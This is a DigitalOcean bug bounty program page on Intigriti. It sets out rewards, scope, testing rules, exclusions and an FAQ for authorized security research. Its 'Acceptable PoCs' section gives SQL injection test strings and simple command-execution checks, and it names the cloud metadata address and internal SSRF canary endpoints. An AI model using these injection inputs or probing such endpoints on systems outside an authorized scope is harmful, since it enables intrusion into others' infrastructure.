Description

DigitalOcean, LLC. is an American multinational technology company and cloud service provider. DigitalOcean simplifies cloud computing so developers and businesses can spend more time building software that changes the world.

Bounties
Low
0.1 - 3.9
Medium
4.0 - 6.9
High
7.0 - 8.9
Critical
9.0 - 9.4
Exceptional
9.5 - 10.0
Tier 2
min. $
max. $
100
450
700
1,500
2,000
4,000
5,000
8,000
8,000
10,000
Tier 2
$100 - $10,000
Tier 3
min. $
max. $
50
150
300
500
600
1,500
1,500
3,000
3,000
3,000
Tier 3
$50 - $3,000
Rules of engagement
Required
Not applicable
max. 10 requests/sec
X-BBP-Researcher: {Username}

By participating in this program, you agree to:

  • Respect the Community Code of Conduct
  • Respect the Intigriti Terms and Conditions
  • Respect the scope of the program
  • Not discuss or disclose vulnerability information without prior written consent (including PoC's on YouTube and Vimeo)

Program Rules

  • While testing, please only test against your own accounts and resources. Targeting DigitalOcean users or their resources (e.g. Droplets, Spaces, Databases, etc.) is NOT allowed.
  • Do not host personal or commercial applications on servers underneath your [@]intigriti.me DigitalOcean account.
  • While testing, we encourage (but do not require) you to include a custom HTTP header in all your requests.
    • Providing such information will assist us with correlating your traffic to your research and expedite our ability to validate your report.
  • Please provide detailed reports with reproducible steps. If the report is not detailed enough to reproduce the issue, the issue will not be eligible for a bounty.
  • Multiple vulnerabilities caused by one underlying issue will be considered one issue.
  • When duplicates occur, we only award the first report that was received (provided that it can be fully reproduced).
  • Please help make a good faith effort to avoid privacy violations, destruction of data, or service degradation.

Validation times

We will validate all submissions within the below timelines, once your submission has been verified by Intigriti.

DigitalOcean will make a best effort to meet the following SLAs for hackers participating in our program.
The following SLAs are in business days (Mon-Fri) and may exclude days where there are regional holidays in the countries where our DigitalOcean staff are located.

Vulnerability Severity Time to validate
Exceptional 2 Working days
Critical 2 Working days
High 5 Working days
Medium 15 Working days
Low 15 Working days

Between Dec 9, 2024 and Jan 2, 2024:

Vulnerability Severity Time to validate
Exceptional 3 Working days
Critical 3 Working days
High 14 Working days
Medium To be reviewed after Jan 2
Low To be reviewed after Jan 2

We'll try to keep you informed about our progress throughout the process.

Check our fix
We offer up to $50 bonus to verify a resolved issue for us (when requested).
This remains at the discretion of DigitalOcean to award.

Domains

*.digitalocean.com

Tier 2
Wildcard

Public IPs belonging to AS14061(DigitalOcean, LLC) are assigned to DigitalOcean customers and should be considered out of scope.

The following subdomains are out of scope:

  • cloudsupport.digitalocean.com
  • ideas.digitalocean.com
  • investor.digitalocean.com
  • investors.digitalocean.com
  • ir.digitalocean.com
  • deploy.digitalocean.com
  • pilot.digitalocean.com
  • rewards.digitalocean.com
  • anchor.digitalocean.com
  • waves.digitalocean.com
  • brand.digitalocean.com
  • go.digitalocean.com
  • groove.digitalocean.com
  • email.digitalocean.com
  • status.digitalocean.com
  • events.digitalocean.com
  • helpdesk.digitalocean.com
  • mirrors.digitalocean.com
  • segment.digitalocean.com
  • tracking.digitalocean.com

169.254.169.254

Tier 2
IP Range

Metadata service available at http://169.254.169.254/ from Droplets

Findings against resources owned by your account should be filed underneath this asset.

  • While performing your research, please limit the scope of testing to only the accounts or resources that are owned by you.
  • If you discover a vulnerability that could allow you to bypass existing controls and gain access to other accounts, please do not take any further action against those accounts or data that are not owned by you.

https://github.com/digitalocean/do-agent

Tier 2
Other

A daemon that helps collect system metrics from droplets.

https://github.com/digitalocean/doctl

Tier 2
Other

The official command line interface for the DigitalOcean API.

https://github.com/digitalocean/droplet-agent

Tier 2
Other

A daemon that enables web console access on droplets

https://github.com/digitalocean/go-nbd

Tier 2
Other

golang-only network block device client

https://github.com/digitalocean/terraform-provider-digitalocean

Tier 2
Other

DigitalOcean's official Terraform provider.

Note that marketplace 1-click apps and add-ons are maintained by our partnered vendors and are out of scope. Security issues against these components of the marketplace are not in the scope of this program and ineligible for bounty rewards, but we are happy to help facilitate communications to the application owners.

Please reach out to us at security@digitalocean.com for facilitation.

SnapShooter is a cloud backup and recovery solution

Tier 3
URL

Company shortlink service

API for hacktoberfest.com

https://github.com/digitalocean/do-markdownit

Tier 3
Other

Markdown plugin run against all user-submitted content on https://digitalocean.com/community.

URL

We do not currently offer bounty rewards for findings related to the paperspace.com domain or associated sub-domains.

*.db.ondigitalocean.com

Out of scope
Wildcard

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any database created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.digitaloceanspaces.com

Out of scope
Wildcard

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Spaces buckets created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.doserverless.co

Out of scope
Wildcard

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Functions created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.k8s.ondigitalocean.com

Out of scope
Wildcard

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Kubernetes clusters created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.ondigitalocean.app

Out of scope
Wildcard

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Apps created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

Assets created by other DigitalOcean customers

Out of scope
Other

Any asset (Droplet, Space, or otherwise) created by other DigitalOcean customers are not to be tested under any circumstances.

Marketplace Apps and Add-Ons

Out of scope
Other

The marketplace applications and add-ons are maintained by our partnered vendors. Security issues are not in the scope of this program and ineligible for bounty rewards, but we are happy to help facilitate communications to the application owners.
Please reach out to us at security@digitalocean.com for facilitation.

Other DigitalOcean open source projects not listed

Out of scope
Other

All open source projects hosted by DigitalOcean not otherwise listed as in-scope are out-of-scope.

registry.digitalocean.com/*

Out of scope
Wildcard

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any container registries created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

In scope

Introduction
DigitalOcean is a cloud service provider offering infrastructure-as-a-service and platform-as-a-service solutions. DigitalOcean simplifies cloud computing so developers and businesses can spend more time building software that changes the world. At DigitalOcean, our customers’ trust is critical to us. We know that our customers need a secure foundation to build on, which is why we take security seriously. We look forward to working with the security community across the globe to find vulnerabilities in order to keep our customers and businesses safe. Please read the following content on how to best engage this program, stay within scope boundaries, and more.

Looking for other DigitalOcean assets? Take a look at our other bug bounty programs:

High Impact Findings
We are particularly interested in findings that enable widespread compromise of other customers or penetrate DigitalOcean’s core backend systems. These behaviors are not limited to specific vulnerability categories, but some examples include:

  • Broken authorization leading to access of other DigitalOcean customer records
  • Breaking out of process controls (e.g. access the hypervisor from your guest)
  • Remote code execution on core DigitalOcean infrastructure
  • Cross-VM attacks to break the multi-tenancy architecture

Acceptable PoCs

  • Command execution: whoami, hostname, uname
  • File reads: /etc/hostname
  • File writes: /tmp/bbp_<intigriti username>
  • SQL injection: basic evidence (' OR 1='1 causes all rows to return and ' AND 0='1 causes zero rows to return) is fine, but feel free to extract the username of the database user as well

DigitalOcean Products

Compute

  • Droplets - On-demand Linux virtual machines
  • Kubernetes - Managed Kubernetes service
  • App Platform - Platform-as-a-Service (PaaS) offering allowing users to build, deploy, and scale apps quickly while DigitalOcean manages the infrastructure, app runtime, and dependencies
  • Functions - Serverless computing solution to run on-demand code

Storage

Networking

  • Load Balancers - Fully-managed, highly available network load balancing service
  • Cloud Firewalls - Network-based, stateful firewall service for Droplets
  • Virtual Private Cloud (VPC) - Logically isolated private network interface for cloud resources in the same account
  • Reserved IPs - Publicly-accessible static IP addresses that can be assigned to a Droplet
  • Domains and DNS - DNS records managed from the DigitalOcean control panel, and can be integrated with Load Balancers and Spaces to streamline TLS certificate management
    • NOTE: DigitalOcean is not a domain name registrar
  • IPv6 - You can enable IPv6 on Droplets

Management Tools

  • Monitoring - Free, opt-in service that gathers metrics about Droplet-level resource utilization
  • Uptime - Monitoring service that checks the health of any URL or IP address

Accounts

  • Teams - Teams are our account boundary. Someone in one team cannot manage resources in another team they are not a member of.
  • SSH Keys - Manage SSH keys available to be provisioned onto Droplets
  • 2FA - Using two-factor authentication (2FA) on DigitalOcean adds an additional layer of security against unauthorized access to your account

Tools and Services

  • API - DigitalOcean's public REST API
  • Images
    • Backups - Automatically-created disk images for Droplets
    • Snapshots - On-demand disk images of Droplets and volumes saved to your account
    • Custom Images - Custom Linux or Unix-like images that you can import to DigitalOcean
  • doctl - The official command line interface for the DigitalOcean API
  • do-agent - A daemon that collects system metrics from Droplets
  • droplet-agent - A daemon that enables web console access on Droplets

Feedback
Would you like to help us improve our program or have some feedback to share, please send your anonymous feedback here: Program feedback link
Please note this form will be checked periodically and should not be used for submission or support queries.

Out of scope

Submissions targeting resources or accounts owned by other DigitalOcean customers are out of scope.

As a cloud provider, DigitalOcean owns a large IP space and nearly every report we receive in which attribution is solely based on IP address are out of scope reports on customers. For example, assets (e.g. random public DigitalOcean IPs or Spaces buckets with *.digitaloceanspaces.com domain) that Shodan or similar vulnerability scanners scan against are usually customers’ assets and thus are out of the scope of this program and should never be tested against. Public IPs belonging to AS14061(DigitalOcean, LLC) are usually assigned to DigitalOcean customers.

Please do not submit findings from automated scans unless you have verified and have high confidence that the vulnerable targets are part of DigitalOcean’s public infrastructure and have a demonstrated security impact. Repetitive submissions against DigitalOcean customers may result in expulsion from our program.

Application-Specific Exclusions

  1. Third-Party Vulnerabilities:
    1.1 Use of known vulnerable libraries/software without working proof of exploitability or impact.
  2. Information Disclosure:
    2.1 Wordpress username disclosure.
    2.2 Verbose messages/files/directory listings without sensitive info.
    2.3 Banner grabbing/version disclosure.
  3. OAuth/Authentication Issues:
    3.1 Pre-auth account takeover/OAuth squatting.
  4. Low-Impact Client-Side Vulnerabilities:
    4.1 Self-XSS that cannot be used to exploit others.
  5. Cross-Origin Resource Sharing (CORS):
    5.1 CORS Misconfiguration on non-sensitive endpoints.
  6. Cookie and Security Headers:
    6.1 Missing cookie flags.
    6.2 Missing security headers.
  7. Cross-Site Request Forgery Issues:
    7.1 Low/no impact CSRF attacks.
  8. Rate Limiting:
    8.1 Bypassing rate-limits or the non-existence of rate-limits.
  9. Outdated Browsers:
    9.1 Vulnerabilities affecting users with outdated/unpatched browsers (more than two versions behind).
  10. File Upload Issues:
    10.1 Arbitrary file upload without proof of existence
  11. Server-Side Request Forgery (SSRF):
    11.1 Blind SSRF without proven business impact (e.g., pingbacks).
  12. Subdomain Issues:
    12.1 Subdomain takeover without actual takeover.
  13. Metadata Handling Issues:
    13.1 Not stripping metadata from files.
  14. Header Injection Vulnerabilities:
    14.1 Host header injection without proven business impact.
  15. Outdated Domains & Static Links:
    15.1 Links on static content referencing outdated third-party domains.
  16. Miscellaneous:
    16.1 Clickjacking without proven impact or unrealistic user interaction.
    16.2 Reverse tabnabbing.
    16.3 CSV injection.
    16.4 Autocomplete attribute on web forms.
    16.5 Non-invalidation of sessions (logout, enabling 2FA, etc.).
    16.6 Tokens leaked to third parties.
    16.7 Content injection without HTML modification.
    16.8 Email bombing.
    16.9 HTTP request smuggling with no proven impact.
    16.10 Homograph attacks.
    16.11 XMLRPC enabled.
    16.12 Anything related to email spoofing, SPF, DMARC or DKIM

General Exclusions

  1. Publicly known processor Side-Channel Attacks:
    17.1 The reason this rule exists is because there is no safe way to test without a special setup. If you have strong reason to believe that an issue may impact our environment, please contact us at security@digitalocean.com and we'll work with you to set up an environment for safe testing.
  2. Known Vulnerabilities:
    18.1 If a reported vulnerability is already known through other means, it will be flagged as a duplicate
  3. Theoretical Issues:
    19.1 Security issues without realistic exploitation scenarios or requiring complex user interactions.
  4. Physical & Social Engineering Attacks:
    20.1 Spam, social engineering, physical intrusion.
    20.2 Attacks needing physical access, man-in-the-middle, or compromised user accounts.
  5. Denial of Service (DoS/DDoS):
    21.1 DoS/DDoS attacks or brute force attacks.
  6. Outdated Software:
    22.1 Vulnerabilities in software that no longer receive security updates.
    22.2 Reports stating software is outdated/vulnerable without proof of concept
  7. Zero-Day Vulnerabilities:
    23.1 Newly discovered zero-days within 30 days of public patch release (reportable but not bounty eligible).
  8. Third-party source of secrets, such as employee credentials
    24.1 We do not award bounty rewards for the reporting of leaked secrets unless there is a specific vulnerability in our platform that lead to the secrets disclosure. If that is the case, please submit a report about that vulnerability instead.
    24.2 You may email us at security@digitalocean.com to inform us about leaked secrets in credential lists or public databases. While this will not be awarded a bounty payout, we appreciate good faith notices and will investigate your claim.
Severity assessment

DigitalOcean does not leverage CVSS for its severity assessment. Instead, we take a contextual look at impact and likelihood of a vulnerability and determine the commensurate risk to our business or customers between Informational, Low, Medium, High, or Critical. This means that you can be sure real, experienced security professionals are looking at all the details of your report to determine the severity and resulting bounty payment; you're not limited by what an algorithm dictates. When we triage issues, we will provide justification as to our severity decision if it differs from yours. Please note that our severity table ends at Critical. We will only consider Exceptional tier for truly monumental impact to the organization.

When deciding what severity to set on your report, you may use CVSS, CWSS, SSVC, EPSS, or any other combination of tools to help you determine an accurate threshold. Please do not mark every issue a Critical/High severity unless you have reasonable justification for doing so.

DigitalOcean will only issue monetary rewards for reports demonstrating meaningful impact. If DigitalOcean decides to offer a reward for a vulnerability report, the value of the reward will be based on the impact and severity of the reported vulnerability, to be determined by DigitalOcean in its sole discretion. Awards are granted entirely at the discretion of DigitalOcean.

For this reason, we strongly encourage researchers to spend extra time to provide a realistic attack/threat scenario adapted to our business. This will increase the chance of receiving a higher bounty.

At DigitalOcean's discretion, providing more complete research, proof-of-concept code, and detailed writeups may increase the bounty awarded. Conversely, DigitalOcean may pay less for vulnerabilities that require complex or over-complicated interactions for which the impact or security risk is negligible.

FAQ

How can I create an account?

You can self-register on the application, but please don’t forget to use your @intigriti.me email address.

  • Please create dedicated testing accounts for any DO security research engagement. This allows our teams to know if any anomalous activity is associated with Intigriti or potential bad actors.
  • Please register a DigitalOcean account using your Intigriti @intigriti.me email.
  • Feel free to sign up for new accounts on https://try.digitalocean.com/freetrialoffer/ to receive $200 in credits valid for 60 days (a valid credit card is still required to be linked to the account).
  • If you are testing with an account that does not use your Intigriti email address, we may take action against it for perceived malicious activity (account locks, bans, etc.)
  • Once you have finished testing, don’t forget to spin down resources to avoid any undue consumption.
  • Beyond the free trial offer, we will not provide credits or reimburse charges to researchers.

I think I found SSRF. How can I prove it?

We have set up an internal service you can try to hit to prove SSRF in our environment.
There are two endpoints you can try:

  • https://ssrf-sheriff.internal.digitalocean.com/
  • https://ssrf-sheriff.s2r1.internal.digitalocean.com/

Please include your Intigriti username in an X-BBP-Researcher header if you are able to control headers in your SSRF attempt.

If your SSRF request is successful, you will receive a unique code to include in your report as proof of your success.
If you discover blind SSRF, the endpoint will trigger an alert for our Security team to validate against. Please include timestamp and IP information when you write up your report.

All aboard!
Please log in or sign up on the platform

For obvious reasons we can only allow submissions or applications for our program with a valid Intigriti account.

It will only take 2 minutes to create a new one or even less to log in with an existing account, so don't hesitate and let's get started. We would be thrilled to have you as part of our community.

Overall stats
submissions received
326
average payout
$1,117
accepted submissions
65
total payouts
$68,117
Last 90 day response times
avg. time first response
< 2 days
avg. time to decide
< 3 weeks
avg. time to triage
< 3 days
Activity
12/11
logo
saad0x
created a submission
12/10
DigitalOcean
closed a submission
12/10
DigitalOcean
closed a submission
12/10
logo
dedsec_hacker
created a submission
12/10
DigitalOcean
closed a submission
12/10
DigitalOcean
closed a submission
12/10
logo
saim333
created a submission
12/9
logo
emloshell
created a submission
12/9
logo
codermak
created a submission
12/9
logo
xzero
created a submission